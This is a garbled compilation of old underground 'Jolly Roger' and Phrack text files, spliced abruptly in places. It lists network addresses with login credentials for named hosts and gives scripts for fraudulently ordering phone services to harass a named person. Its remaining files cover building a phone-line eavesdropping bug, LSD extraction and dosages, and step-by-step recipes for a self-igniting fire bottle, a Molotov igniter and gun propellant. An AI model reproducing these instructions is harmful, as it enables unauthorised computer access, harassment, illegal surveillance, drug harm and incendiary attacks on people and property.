He was fascinated. What in the world was this? He knew he was going tocall back, but before he did, he tried some more experiments. He tried the840exchange in several other area codes. In some, it came up as a validexchange.In others, exactly the same thing happened -- the same last four digits,thesame Southern belle. Oddly enough, he later noticed, the areas worked inseemed to travel in a beeline from Washington DC to Pittsburgh, PA.
He called back from a payphone. "Operator, can I help you?"
"Yes, this is the phone company. I'm testing this line and we don'tseem tohave an identification on your circuit. What office is this, please?"
"What number are you trying to reach?"
"I'm not trying to reach any number. I'm trying to identify thiscircuit."
"I'm sorry, I can't help you."
"Ma'am, if I don't get an ID on this line, I'll have to disconnect it.Weshow no record of it here."
"Hold on a moment, sir."
After about a minute, she came back. "Sir, I can have someone speak toyou.Would you give me your number, please?"
He had anticipated this and he had the payphone number ready. After hegaveit, she said, "Mr. XXX will get right back to you."
"Thanks." He hung up the phone. It rang. INSTANTLY! "Oh my God," hethought, "They weren't asking for my number -- they were confirming it!"
"Hello," he said, trying to sound authoritative.
‡ "This is Mr. XXX. Did you just make an inquiry to my office concerningaphone number?"
"Yes. I need an identi--"
"What you need is advice. Don't ever call that number again. Forget youever knew it."
At this point our friend got so nervous he just hung up. He expected tohear the phone ring again but it didn't.
Over the next few days he racked his brains trying to figure out whatthenumber was. He knew it was something big -- that was pretty certain atthispoint. It was so big that the number was programmed into every centralofficein the country. He knew this because if he tried to dial any other numberinthat exchange, he'd get a local error message from his CO, as if theexchangedidn't exist.
It finally came to him. He had an uncle who worked in a federal agency.Hehad a feeling that this was government related and if it was, his unclecouldprobably find out what it was. He asked the next day and his unclepromised tolook into the matter.
The next time he saw his uncle, he noticed a big change in his manner.Hewas trembling. "Where did you get that number?!" he shouted. "Do youknow Ialmost got fired for asking about it?!? They kept wanting to know where Igotit."
Our friend couldn't contain his excitement. "What is it?" he pleaded."What's the number?!"
"IT'S THE PRESIDENT'S BOMB SHELTER!"
He never called the number after that. He knew that he could probablycausequite a bit of excitement by calling the number and saying something like,"Theweather's not good in Washington. We're coming over for a visit." But ourfriend was smart. he knew that there were some things that were better offunsaid and undone.
(A fucking great story from the Official Phreaker's Guide)
------------Jolly Roger

Telenet Courtesy of the Jolly Roger
It seems that not many of you know that Telenet is connected to about 80computer-networks in the world. No, I don't mean 80 nodes, but 80 networkswiththousands of unprotected computers. When you call your local Telenet-gateway,you can only call those computers which accept reverse-charging- calls. If you want to call computers in foreign countries or computers in USAwhichdo not accept R-calls, you need a Telenet-ID. Did you ever notice that youcantype ID XXXX when being connected to Telenet? You are then asked for thepassword. If you have such a NUI (Network-User-ID) you can call nearlyeveryhost connected to any computer-network in the world. Here are someexamples:
026245400090184 :Is a VAX in Germany (Username: DATEXP and leave mail forCHRIS !!!)0311050500061 :Is the Los Alamos Integrated computing network (One of thehosts connected to it is the DNA (Defense Nuclear Agency)!!!)0530197000016 :Is a BBS in New Zealand024050256 :Is the S-E-Bank in Stockholm, Sweden (Login as GAMES !!!)02284681140541 :CERN in Geneva in Switzerland (one of the biggest nuclearresearch centers in the world) Login as GUEST0234212301161 :A Videotex-standard system. Type OPTEL to get in and usetheID 999_ with the password 9_0242211000001 :University of Oslo in Norway (Type LOGIN 17,17 to playtheMulti-User-Dungeon !)0425130000215 :Something like ITT Dialcom, but this one is in Israel ! IDHELP with password HELP works fine with security level 30310600584401 :Is the Washington Post News Service via Tymnet (Yes,Tymnet isconnected to Telenet, too !) ID and Password is: PETER You can read thenewsof the next day !
The prefixes are as follows:02624 is Datex-P in Germany02342 is PSS in England03110 is Telenet in USA03106 is Tymnet in USA02405 is Telepak in Sweden04251 is Isranet in Israel02080 is Transpac in France02284 is Telepac in Switzerland02724 is Eirpac in Ireland02704 is Luxpac in Luxembourg05252 is Telepac in Singapore04408 is Venus-P in Japan...and so on... Some of the countries have more than onepacket-switching-network (USA has 11, Canada has 3, etc).
OK. That should be enough for the moment. As you see most of the passwords
arevery simple. This is because they must not have any fear of hackers. Only afewGerman hackers use these networks. Most of the computers are absolutelyeasy tohack !!! So, try to find out some Telenet-ID's and leave them here. If youneedmore numbers, leave e-mail.I'm calling from Germany via the German Datex-P network, which is similartoTelenet. We have a lot of those NUI's for the German network, but none foraspecial Tymnet-outdial-computer in USA, which connects me to any phone #.
CUL8R, Mad Max
PS: Call 026245621040000 and type ID INF300 with password DATACOM to getmore
Informations on packet-switching-networks !
PS2: The new password for the Washington Post is KING !!!!
Fucking with the Operator courtesy of the Jolly Roger
Ever get an operator who gave you a hard time, and you didn'tknowwhat to do? Well if the operator hears you use a little Bell jargon, shemightwise up. Here is a little diagram (excuse the artwork) of the structure ofoperators
/--------\ /------\ /-----\!Operator!-- > ! S.A. ! --->! BOS !\--------/ \------/ \-----/ ! ! V/-------------\! Group Chief !\-------------/
Now most of the operators are not bugged, so they can curse at you, iftheydo ask INSTANTLY for the "S.A." or the Service Assistant. The operator doesnotreport to her (95% of them are hers) but they will solve most of yourproblems.She MUST give you her name as she connects & all of these calls are bugged.Ifthe SA gives you a rough time get her BOS (Business Office Supervisor) ontheline. S/He will almost always back her girls up, but sometimes the SA willgettarred and feathered. The operator reports to the Group Chief, and S/Hewillsolve 100% of your problems, but the chances of getting S/He on the line
arenill. If a lineman (the guy who works out on the poles) or an installationmangives you the works ask to speak to the Installation Foreman, that workswonders. Here is some other bell jargon, that might come in handy if you arehavingtrouble with the line. Or they can be used to lie your way out ofsituations....
An Erling is a line busy for 1 hour, used mostly in traffic studies APermanent Signal is that terrible howling you get if you disconnect, butdon'thang up. Everyone knows what a busy signal is, but some idiots think that isthe*Actual* ringing of the phone, when it just is a tone "beeps" when thephone isringing, wouldn't bet on this though, it can (and does) get out of sync. When you get a busy signal that is 2 times as fast as the normal one,theperson you are trying to reach isn't really on the phone, (he might be), itisactually the signal that a trunk line somewhere is busy and they haven't orcan't reroute your call. Sometimes you will get a Recording, or if you getnothing at all (Left High & Dry in fone terms) all the recordings are beingused and the system is really overused, will probably go down in a littlewhile. This happened when Kennedy was shot, the system just couldn't handlethecalls. By the way this is called the "reorder signal" and the trunk line is"blocked". One more thing, if an overseas call isn't completed and doesn'tgenerateany money for AT&T, is is called an "Air & Water Call".

==Phrack Inc.==
Volume One, Issue One, Phile #4 of 8
THE PHONE PHREAK'S FRY-UM GUIDE
COMPILED BY THE IRON SOLDIER
WITH HELP FROM DR. DOVE
NOTE: THIS GUIDE IS STILL BEING COMPILED, AND AS PHONE PHREAKS LEARN MOREINTHE ART OF VENGEANCE IT WILL ALWAYS EXPAND.
"Vengeance is mine", says the Phreak.
METHOD 1-PHONE LINE PHUN
‡Call up the business office. It should be listed at the front of the whitepages. Say you wanted to disconnect Scott Korman's line. DIAL800-xxx-xxxx. "Hello, this is Mr. Korman, I'm moving to California and would liketohave my phone service disconnected. I'm at the airport now. I'm callingfroma payphone, my number is [414] 445 5005. You can send my final bill to:(somewhere in California). Thank you."
METHOD 2-PHONE BOOKS
Call up the business office from a pay phone. Say : "Hello, I'd like to order a Phone Book for Upper Volta (or anyout-of-theway area with Direct Dialing). This is Scott Korman, ship to 3119 N. 44thSt.Milwaukee, WI 53216. Yes, I under stand it will cost $xx($25-$75!!). Thankyou."
METHOD 3-PHONE CALLS
Call up a PBX, enter the code and get an outside line. Then dial 0+ thenumberdesired to call. You will hear a bonk and then an operator. Say, "I'dlike tocharge this to my home phone at 414-445-5005. Thank you." A friend and Ididthis to a loser, I called him at 1:00 AM and we left the fone off the hookallnight. I calculated that it cost him $168.
METHOD 4-MISC SERVICES
Call up the business office once again from a payfone. Say you'd like callwaiting, forwarding, 3 way, etc. Once again you are the famed loser ScottKorman. He pays-you laugh. You don't know how funny it was talking tohim,and wondering what those clicks he kept hearing were.
METHOD 5-CHANGED & UNPUB
Do the same as in #4, but say you'd like to change and unlist your(Scott's)number. Anyone calling him will get:
"BEW BEW BEEP. The number you have reached, 445-5005, has been changedtoa non-published number. No further....."
METHOD 6-FORWRDING
This required an accomplice or two or three. Around Christmas time, go
toToys 'R' Us. Get everyone at the customer service or manager's desk away("Hey, could you help me"). then you get on their phone and dial (usuallydial9 first) and the business office again. This time, say you are from Toys'R'Us, and you'd like to add call forwarding to 445-5005. Scott will get100-600calls a day!!!
METHOD 7-RUSSIAN CALLER
Call a payphone at 10:00 PM. Say to the operator that you'd like tobook acall to Russia. Say you are calling from a payphone, and your number isthatof the loser to fry (e.g. 445-5005). She will say that she'll have to callyaback in 5 hours, and you ok that. Meanwhile the loser (e.g.) Scott, willget acall at 3:00 AM from an operator saying that the call he booked to Russiaisready.
IF YOU HAVE ANY QUESTIONS LEAVE E-MAIL FOR ME ON ANY BOARD I'M ON.The Iron SoldierTSF-The Second Foundation!

International Country Code Listing courtesy of the Jolly Roger
*UNITED KINGDOM/IRELAND------------------------------------IRELAND.........................353UNITED KINGDOM...................44
*EUROPE------------------------------------ANDORRA..........................33AUSTRIA..........................43BELGIUM..........................32CYPRUS..........................357CZECHOLSLOVAKIA..................42DENMARK..........................45FINLAND.........................358FRANCE...........................33GERMAN DEMOCRATIC REPUBLIC.......37GERMANY, FEDERAL REPUBLIC OF.....49GIBRALTAR.......................350GREECE...........................30HUNGARY..........................36ICELAND.........................354ITALY............................39LIECHTENSTEIN....................41
LUXEMBOURG......................352MONACO...........................33NETHERLANDS......................31NORWAY...........................47POLAND...........................48PORTUGAL........................351ROMANIA..........................40SAN MARINO.......................39SPAIN............................34SWEDEN...........................46SWITZERLAND......................41TURKEY...........................90VATICAN CITY.....................39YUGOSLAVIA.......................38
*CENTRAL AMERICA------------------------------------BELIZE..........................501COSTA RICA......................506EL SALVADOR.....................503GUATEMALA.......................502HONDURAS........................504NICARAGUA.......................505PANAMA..........................507
*AFRICA------------------------------------ALGERIA.........................213CAMEROON........................237EGYPT............................20ETHIOPIA........................251GABON...........................241IVORY COAST.....................225KENYA...........................254LESOTHO.........................266LIBERIA.........................231LIBYA...........................218MALAWI..........................265MOROCCO.........................212NAMIBIA.........................264NIGERIA.........................234SENEGAL.........................221SOUTH AFRICA.....................27SWAZILAND.......................268TANZANIA........................255TUNISIA.........................216UGANDA..........................256ZAMBIA..........................260ZIMBABWE........................263
*PACIFIC------------------------------------AMERICAN SAMOA..................684AUSTRAILIA.......................61BRUNEI..........................673FIJI............................679FRENCH POLYNESIA................689GUAM............................671
HONG KONG.......................852INDONESIA........................62JAPAN............................81KOREA, REPUBLIC OF...............82MALAYSIA.........................60NEW CALEDONIA...................687NEW ZEALAND......................64PAPUA NEW GUINEA................675PHILIPPINES......................63SAIPAN..........................670SINGAPORE........................65TAIWAN..........................886THAILAND.........................66
*INDIAN OCEAN------------------------------------PAKISTAN.........................92SRI LANKA........................94
*SOUTH AMERICA------------------------------------ARGENTINA........................54BOLIVIA.........................591BRAZIL...........................55CHILE............................56COLOMBIA.........................57ECUADOR.........................593GUYANA..........................592PARAGUAY........................595PERU.............................51SURINAME........................597URUGUAY.........................598VENEZUELA........................58
*NEAR EAST------------------------------------BAHRAIN.........................973IRAN.............................98IRAQ............................964ISRAEL..........................972JORDAN..........................962KUWAIT..........................965OMAN............................968QATAR...........................974SAUDI ARABIA....................966UNITED ARAB EMIRATES............971YEMEN ARAB REPUBLIC.............967
*CARIBBEAN/ATLANTIC------------------------------------FRENCH ANTILLES.................596GUANTANAMO BAY (US NAVY BASE)....53HAITI...........................509NETHERLANDS ANTILLES............599ST. PIERRE AND MIQUELON.........508
*INDIA------------------------------------
INDIA............................91
*CANADA------------------------------------TO CALL CANADA, DIAL 1 + AREA CODE +LOCAL NUMBER.
*MEXICO------------------------------------TO CALL MEXICO, DIAL 011 + 52 + CITY CODE+ LOCAL NUMBER.
To dial international calls:
International Access Code + Country code + Routing code
Example :
To call Frankfurt, Germany, you would do the following:
011 + 49 + 611 + (# wanted) + # sign(octothrope)
The # sign at the end is to tell Bell that you are done entering in all theneeded info.
The Infinity Transmitter courtesy of the Jolly Roger originally typed by: <<>>
FROM THE BOOK BUILD YOUR OWN LASER, PHASER, ION RAY GUN & OTHER WORKING SPACE-AGE PROJECTS BY ROBERT IANNINI (TAB BOOKS INC)
Description: Briefly, the Infinity Transmitter is a device which activatesamicrophone via a phone call. It is plugged into the phone line, and whenthephone rings, it will immediately intercept the ring and broadcast into thephone any sound that is in the room. This device was originally made byInformation Unlimited, and had a touch tone decoder to prevent all who didnotknow the code from being able to use the phone in its normal way. Thisversion, however, will activate the microphone for anyone who calls whileit isin operation.NOTE: It is illegal to use this device to try to bug someone. It is alsopretty stupid because they are fairly noticeable.Parts List:Pretend that uF means micro Farad, cap= capacitor
Part # Description---- - -----------R1,4,8 3 390 k 1/4 watt resistorR2 1 5.6 M 1/4 watt resistorR3,5,6 3 6.8 k 1/4 watt resistorR7/S1 1 5 k pot/switchR9,16 2 100 k 1/4 watt resistor
R10 1 2.2 k 1/4 watt resistorR13,18 2 1 k 1/4 watt resistorR14 1 470 ohm 1/4 watt resistorR15 1 10 k 1/4 watt resistorR17 1 1 M 1/4 watt resistorC1 1 .05 uF/25 V disc capC2,3,5,6,7 5 1 uF 50 V electrolytic cap or tant (preferably non-polarized)C4,11,12 3 .01 uF/50 V disc capC8,10 2 100 uF @ 25 V electrolytic capC9 1 5 uF @ 150 V electrolytic capC13 1 10 uF @ 25 V electrolytic capTM1 1 555 timer dipA1 1 CA3018 amp array in canQ1,2 2 PN2222 npn sil transistorQ3 1 D4OD5 npn pwr tab transistorD1,2 2 50 V 1 amp react. 1N4002T1 1 1.5 k/500 matching transformerM1 1 large crystal microphoneJ1 1 Phono jack optional for sense outputWR3 (24") #24 red and black hook up wireWR4 (24") #24 black hook up wireCL3,4 2 Alligator clipsCL1,2 2 6" battery snap clipsPB1 1 1 3/4x4 1/2x.1 perfboardCA1 1 5 1/4x3x2 1/8 grey enclosure fabWR15 (12") #24 buss wireKN1 1 small plastic knobBU1 1 small clamp bushingB1,2 2 9 volt transistor battery or 9V ni-cad
Circuit Operation: Not being the most technical guy in the world, and notbeingvery good at electronics (yet), I'm just repeating what Mr. Iannini's saidabout the circuit operation. The Transmitter consists of a high grainamplifier fed into the telephone lines via transformer. The circuit isinitiated by the action of a voltage transient pulse occurring acrossthephone line at the instant the telephone circuit is made (the ring, inotherwords). This transient immediately triggers a timer whose output pin 3goespositive, turning on transistors Q2 and Q3. Timer TM1 now remains in thisstate for a period depending on the values of R17 and C13 (usually about10seconds for the values shown). When Q3 is turned on by the timer, asimulated"off hook" condition is created by the switching action of Q3 connectingthe500 ohm winding of the transformer directly across the phone lines.Simultaneously, Q2 clamps the ground of A1, amplifier, and Q1, outputtransistor, to the negative return of B1,B2, therefore enabling thisamplifiersection. Note that B2 is always required by supplying quiescent power toTM1during normal conditions. System is off/on controlled by S1 (switch). A crystal mike picks up the sounds that are fed to the first twotransistors of the A1 array connected as an emitter follower driving the
remaining two transistors as cascaded common emitters. Output of thearray now drives Q1 capacitively coupled to the 1500 ohm winding of T1.R7 controls the pick up sensitivity of the system. Diode D1 is forward biased at the instant of connection andessentiallyapplies a negative pulse at pin 2 of TM1, initiating the cycle. D2clampsany high positive pulses. C9 dc-isolates and desensitizes the circuit.Thesystem described should operate when any incoming call is made withoutringingthe phone.
Schematic Diagram: Because this is text, this doesn't look too hot.Pleaseuse a little imagination! I will hopefully get a graphics drawing ofthisout as soon as I can on a Fontrix graffile.
To be able to see what everything is, this character: should appear as ahorizontal bar. I did this on a ][e using a ][e 80 column card, so I'msorry ifit looks kinda weird to you.
Symbols: resistor: -/\/\/- switch: _/ _ battery: -!!- capacitor (electrolytic): -(- capacitor (disc): -- _ _ transistor:(c) > (e) Transformer: )( \_/ )( (b) _)(_ diode: < chip: ._____. !_____! (chips are easy to recognize!)
Dots imply a connection between wires. NO DOT, NO CONNECTION.ie.: _!_ means a connection while __ means no connection.---------------------------------------------------------------------------¼-
.________________________to GREEN wire phone line .______________________to RED wire phone line ._________(M1)______________. R1 !__________/\/\/____________! _!_ C1 this wire is the amp ___ <=ground R2 !___________________/\/\/_____________. ._______!_______. !___________________!4 9 11!_____________________________! !___________________!7 12._____________________________! A1 R3 !___________________!10 ____*8!_______.____/\/\/____________!
^ / C4 / \2ma !__________. / /R4 B1 + / \!! R7 C2 / / !____/\/\/___!__)__!8*_/ S1 ^ 6!_______! neg<__/.__!> !_____________. !__________. !________. ._____! C7 '-(- __________________!_______.T1._________________ 1500 )( 500 ohm )( ohm !______.)(.__.
> / +---- Q3 \ !__________________________________________!__. D1 C9 '-<---(------ .______________! .________________! \ .________________! C11 / ._______________! R13 \ / \ !___.__________________________! R16 R15 v !___/\/\/\________!___/\/\/_! neg D2 return !_____<__________! B1,B2 \ / .____________!_. \R14 C12 TM1 2 / !__!5 4!_______! \ !____!1 8!_______! 7 6 3 !_____._.____._! C13 R17 !___)_____!_!______/\/\/__! !______________!________________________________________! \ C10 /R18 !__________)_______________! \ / !___O J1 sense output
Construction notes: Because the damned book just gave a picture instead ofstep by step instructions, and I'll try to give you as much help aspossible. Note that all the parts that you will be using are clearlylabeled in the schematic. The perfboard, knobs, 'gator clips, etc areoptional. I do strongly suggest that you do use the board!!! It will makewiring the components up much much easier than if you don't use it. The knob you can use to control the pot (R7). R7 is used to tune the IT sothat is sounds ok over the phone. (You get to determine what sounds good)By changing the value of C13, you can change the amount of time that thecircuit will stay open (it cannot detect a hang up, so it works on atimer.) A value of 100 micro Farads will increase the time by about 10times. The switch (S1) determines whether or not the unit is operational.Closed is on. Open is off. The negative return is the negative terminals ofthe battery!! The batteries will look something like this when hooked up:
<-v_____. .______. ._____. .____->
__!___!__ __!___!__ + - !_/ _! + - switch ^ 9volts 9volts !_______! neg return !_______!
To hook this up to the phone line, there are three ways, depending uponwhat type of jack you have. If it is the old type (non modular) then youcan just open up the wall plate and connect the wires from the transmitterdirectly to the terminals of the phone. If you have a modular jack with four prongs, attach the red to thenegative prong (don't ask me which is which! I don't have that type ofjack... I've only seen them in stores), and the green to the positiveprong, and plug in. Try not to shock yourself... If you have the clip-in type jack, get double male extension cord (onewith a clip on each end), and chop off one clip. Get a sharp knife andsplice off the grey protective material. You should see four wires,including one green and one red. You attach the appropriate wires from theIT to these two, and plug the other end into the wall.
Getting the IT to work: If you happen to have a problem, you should attemptto do the following (these are common sense rules!!) Make sure that youhave the polarity of all the capacitors right (if you used polarizedcapacitors, that is). Make sure that all the soldering is done well and hasnot short circuited something accidently (like if you have a glob touchingtwo wires which should not be touching.) Check for other short circuits.Check to see if the battery is in right. Check to make sure the switch isclosed. If it still doesn't work, drop me a line on one of the Maryland orVirginia BBSs and I'll try to help you out.
The sense output: Somehow or other, it is possible to hook something elseup to this and activate it by phone (like an alarm, flashing lights, etc.)
As of this writing, I have not tried to make one of these, but I will. Ifyou ñ"1."LSD 7) Resoak the mush in 110 cc. of wood alcohol for two days. 8) Filter and throw away the mush.
9) Add the liquid from the second soak to the solution labeled "1." 10) Pour the liquid into a cookie tray and allow it to evaporate. 11) When all of the liquid has evaporated, a yellow gum remains. This should be scraped up and put into capsules.
30 grams of Morning Glory seeds = 1 trip 15 Hawaiian wood rose seeds = 1 trip
Many companies, such as Northop-King have been coating their seeds with a toxic chemical, which is poison. Order seeds from a wholesaler, as it is much safer and cheaper. Hawaiian wood rose seeds can be ordered directly from:
Chong's Nursery and Flowers P.O. Box 2154 Honolulu, Hawaii
LSD DOSAGES -----------
The basic dosages of acid vary according to what kind of acid is available and what medium of ingestion is used. Chemically, the potency of LSD-25 is measured in micrograms, or mics. If you're chemically minded or making your own acid, then computing the number of micrograms is very important. Usually between 500 and 800 mics is plenty for an 8 hour trip, depending on the quality of the acid, of course. I have heard of people taking as much as 1,500-2,000 mics. This is not only extremely dangerous, it is extremely wasteful.
LSD comes packaged in many different forms. The most common are listed below: 1) The brown spot, or a piece of paper with a dried drop of LSD on it, is always around. Usually one spot equals one trip. 2) Capsuled acid is very tricky, as the cap can be almost any color, size, or potency. Always ask what the acid is cut with, as a lot of acid is cut with either speed or strychnine. Also note dosage. 3) Small white or colored tablets have been known to contain acid, but, as with capsuled acid, it's impossible to tell potency, without asking.
(from the Anarchist's Cookbook. Typed up by Jolly Roger)

Bananas courtesy of the Jolly Roger
Believe it or not, bananas do contain a small quantity of _Musa Sapientum bananadine_, which is a mild, short-lasting psychedelic. There are much easier ways of getting high, but the great advantage to this method is that bananas are legal.
1) Obtain 15 lbs. of ripe yellow bananas. 2) Peel all 15 lbs. and eat the fruit. Save the peels. 3) With a sharp knife, scrape off the insides of the peels and save the scraped material. 4) Put all of the scraped material in a large pot and add water. Boil for three to four hours until it has attained a solid paste consistency. 5) Spread this paste on cookie sheets, and dry in an over for about 20 minutes to a half hour. This will result in a fine black powder. Makes about one pound of bananadine powder. Ususally one will feel the effects of bananadine after smoking three or four cigarettes.
Table of Weights
Pounds Ounces Grams Kilos 1 16 453.6 0.4536 0.0625 1 28.35 0.0283 0.0352 1 0.001 2.205 35.27 1,000 1
(from the Anarchist's Cookbook typed by Jolly Roger)
Yummy Marihuana Recipes courtesy of the Jolly Roger
Acapulco Green --------------
3 ripe avocados 1/2 cup chopped onions 2 teaspoons chili powder 3 tablespoons wine vinegar 1/2 cup chopped marahuana (grass)
Mix the vinegar, grass, and chili powder together and let the mixture stand for one hour. Then add avocados and onions and mash it all together. It can be served with tacos or as a dip.
Pot Soup --------
1 can condensed beef broth 3 tablespoons grass 3 tablespoons lemon juice 1/2 can water 3 tablespoons chopped watercress
Combine all ingredients in a saucepan and bring to a boil over medium heat. Place in a refrigerator for two to three hours, reheat, and serve.
Pork and Beans and Pot ----------------------
1 large can (1 lb. 13 oz.) pork and beans 1/2 cup grass
4 slices bacon 1/2 cup light molasses 1/2 teaspoon hickory salt 3 pineapple rings
Mix together in a casserole, cover top with pineapple and bacon, bake at 350 degrees for about 45 minutes. Serves about six.
The Meat Ball -------------
1 lb. hamburger 1/4 cup chopped onions 1 can cream of mushroom soup 1/4 cup bread crumbs 3 tablespoons grass 3 tablespoons India relish
Mix it all up and shape into meat balls. Brown in frying pan and drain. Place in a casserole with soup and 1/2 cup water, cover and cook over low heat for about 30 minutes. Feeds about four people.
Spaghetti Sauce ---------------
1 can (6 oz.) tomato paste 2 tablespoons olive oil 1/2 cup chopped onions 1/2 cup chopped grass 1 pinch pepper 1 can (6 oz.) water 1/2 clove minced garlic 1 bay leaf 1 pinch thyme 1/2 teaspoon salt
Mix in large pot, cover and simmer with frequent stirring for two hours. Serve over spaghetti.
Pot Loaf --------
1 packet onion soup mix 1 (16 oz.) can whole peeled tomatoes 1/2 cup chopped grass 2 lbs. ground beef or chicken or turkey 1 egg 4 slices bread, crumbled
Mix all ingredients and shape into a loaf. Bake for one hour in 400-degree oven. Serves about six.
Chili Bean Pot --------------
2 lbs. pinto beans 1 lb. bacon, cut into two-inch sections 2 cups red wine
4 tablespoons chili powder 1/2 clove garlic 1 cup chopped grass 1/2 cup mushrooms
Soak beans overnight in water. In a lagre pot pour boiling water over beans and simmer for at least an hour, adding more water to keep beans covered. Now add all other ingredients and continue to simmer for another three hours. Salt to taste. Serves about ten.
Bird Stuffing -------------
5 cups rye bread crumbs 2 tablespoons poultry seasoning 1/2 cup each of raisins and almonds 1/2 cup celery 1/3 cup chopped onions 3 tablespoons melted butter 1/2 cup chopped grass 2 tablespoons red wine
Mix it all together, and then stuff it in.
Apple Pot ---------
4 apples (cored) 1/2 cup brown sugar 1/4 cup water 4 cherries 1/3 cup chopped grass 2 tablespoons cinnamon
Powder the grass in a blender, then mix grass with sugar and water. Stuff cores with this paste. Sprinkle apples with cinnamon, and top with a cherry. Bake for 25 minutes at 350 degrees.
Pot Brownies ------------
1/2 cup flour 3 tablespoons shortening 2 tablespoons honey 1 egg (beaten) 1 tablespoon water 1/2 cup grass pinch of salt 1/4 teaspoon baking powder 1/2 cup sugar 2 tablespoons corn syrup 1 square melted chocolate 1 teaspoon vanilla 1/2 cup chopped nuts
Sift flour, baking powder, and salt together. Mix shortening, sugar, honey, syrup, and egg. Then blend in chocolate and other ingredients, and mix well. Spread in an 8-inch pan and bake for 20 minutes ate 350 degrees.
Banana Bread ------------
1/2 cup shortening 2 eggs 1 teaspoon lemon juice 3 teaspoons baking powder 1 cup sugar 1 cup mashed bananas 2 cups sifted flour 1/2 cup chopped grass 1/2 teaspoon salt 1 cup chopped nuts
Mix the shortening and sugar, beat eggs, and add to mixture. Seperately mix bananas with lemon juice and add to the first mixture. Sift flour, salt, and baking powder together, then mix all ingredients together. Bake for 1 1/4 hours at 375 degrees.
Sesame Seed Cookies -------------------
3 oz. ground roast sesame seeds 3 tablespoons ground almonds 1/4 teaspoon nutmeg 1/4 cup honey 1/2 teaspoon ground ginger 1/4 teaspoon cinnamon 1/4 oz. grass
Toast the grass until slightly brown and then crush it in a mortar. Mix crushed grass with all other ingredients, in a skillet. Place skillet over low flame and add 1 tablespoon of salt butter. Allow it to cook. When cool, roll mixture into little balls and dip them into the sesame seeds.
If you happen to be in the country at a place where pot is being grown, here's one of the greatest recipes you can try. Pick a medium-sized leaf off of the marihuana plant and dip it into a cup of drawn butter, add salt, and eat.
---------------Jolly Roger (from the Anarchist's Cookbook!)

Peanuts by the Jolly Roger
Try this sometime when you are bored!
1) Take one pound of raw peanuts (not roasted!)
2) Shell them, saving the skins and discarding the shells.
3) Eat the nuts.
‡ 4) Grind up the skins and roll them into a cigarette, and smoke!
You'll have fun, believe me! -------------Jolly Roger
Chemical Fire Bottle by the Jolly Roger
This incendiary bottle is self-igniting on target impact.
Materials Required ------------------ How Used Common Source
Sulphuric Acid Storage Batteries Motor Vehicles Material Processing Industrial Plants
Gasoline Motor Fuel Gas Station or Motor Vehicles
Potassium Chlorate Medicine Drug Stores
Sugar Sweetening Foods Food Store
Glass bottle with stopper (roughly 1 quart size) Small Bottle or jar with lid. Rag or absorbant paper (paper towels, newspaper) String or rubber bands
Procedure: ---------
1) Sulphuric Acid MUST be concentrated. If battery acid or other dilute acid is used, concentrate it by boiling until dense white fumes are given off. Container used to boil should be of enamel-ware or oven glass.
CAUTION: Sulphuric Acid will burn skin and destroy clothing. If any is spilled, wash it away with a large quantity of water. Fumes are also VERY dangerous and should not be inhaled.
2) Remove the acid from heat and allow to cool to room temperature.
3) Pour gasoline into the large (1 quart) bottle until it is approximately 1/3 full.
4) Add concentrated sulphuric acid to gasoline slowly until the bottle is filled to within 1" to 2" from top. Place the stopper on the bottle.
5) Wash the outside of the bottle thoroughly with clear water.
CAUTION: If this is not done, the fire bottle may be dangerous to handle during use!
6) Wrap a clean cloth or several sheets of absorbant paper around the outside of the bottle. Tie with string or fasten with rubber bands.
‡ 7) Dissolve 1/2 cup (100 grams) of potassium chlorate and 1/2 cup (100 grams) of sugar in one cup (250 cc) of boiling water.
8) Allow the solution to cool, pour into the small bottle and cap tightly. The cooled solution should be approx. 2/3 crystals and 1/3 liquid. If there is more than this, pour off excess before using.
CAUTION: Store this bottle seperately from the other bottle!
How To Use: ----------
1) Shake the small bottle to mix contents and pour onto the cloth or paper around the large bottle. Bottle can be used wet or after solution is dried. However, when dry, the sugar-Potassium chlorate mixture is very sensitive to spark or flame and should be handled accordingly.
2) Throw or launch the bottle. When the bottle breaks against a hard surface (target) the fuel will ignite.
----------------Jolly Roger
Igniter from Book Matches by the Jolly Roger
This is a hot igniter made from paper book matches for use with molotov cocktail and other incendiaries.
Material Required: -----------------
Paper book matches Adhesive or friction tape
Procedure: ---------
1) Remove the staple(s) from match book and seperate matches from cover.
2) Fold and tape one row of matches (fold in thirds)
3) Shape the cover into a tube with striking surface on the inside and tape. Make sure the folder cover will fit tightly around the taped match heads. Leave cover open at opposite end for insertion of the matches.
4) Push the taped matches into the tube until the bottom ends are exposed about 3/4 in. (2 cm)
5) Flatten and fold the open end of the tube so that it laps over about 1 in. (2-1/2 cm); tape in place.
Use with a Molotov Cocktail: ---------------------------
1) Tape the "match end tab" of the igniter to the neck of the molotov cocktail.
2) Grasp the "cover and tab" and pull sharply or quickly to ignite.
General Use: -----------
The book match igniter can be used by itself to ignite flammable liquids, fuse cords, and similar items requiring hot ignition.
CAUTION: Store matches and completed igniters in moistureproof containers such as rubber or plastic bags until ready for use. Damp or wet paper book matches will not ignite.
--------------Jolly Roger
"Red or White Powder" Propellant by the Jolly Roger
"Red or White Powder" Propellant may be prepared in a simple, safe manner. The formulation described below will result in approximately 2 1/2 pounds of powder. This is a small arms propellant and should only be used in weapons with 1/2 in. diameter or less (but not pistols!).
Material Required: -----------------
Heat Source (Kitchen Stove or open fire) 2 gallon metal bucket Measuring cup (8 ounces) Wooden spoon or rubber spatula Metal sheet or aluminum foil (at least 18 in. sq.) Flat window screen (at least 1 foot square) Potassium Nitrate (granulated) 2-1/3 cups White sugar (granulated) 2 cups Powdered ferric oxide (rust) 1/8 cup (if available) Clear water, 1-1/2 cups
Procedure: ---------
1) Place the sugar, potassium nitrate, and water in the bucket. Heat with a low flame, stirring occasionally until the sugar and potassium nitrate dissolve.
2) If available, add the ferric oxide (rust) to the solution. Increase the flame under the mixture until it boils gently.
NOTE: The mixture will retain the rust coloration.
3) Stir and scrape the bucket sides occasionally until the mixture is reduced to one quarter of its original volume, then stir continuously.
4) As the water evaporates, the mixture will become thicker until it reaches the consistency of cooked breakfast cereal or homemade
fudge. At this stage of thickness, remove the bucket from the heat source, and spread the mass on the metal sheet.
5) While the material cools, score it with a spoon or spatula in crisscrossed furrows about 1 inch apart.
6) Allow the material to dry, preferably in the sun. As it dries, resore it accordingly (about every 20 minutes) to aid drying.
7) When the material has dried to a point where it is moist and soft but not sticky to the touch, place a small spoonful on the screen. Rub the material back and forth against the screen mesh with spoon or other flat object until the material is granulated into small worm-like particles.
8) After granulation, return the material to the sun to allow to dry completely.
----------------Jolly Roger
Pipe Hand Grenade by the Jolly Roger
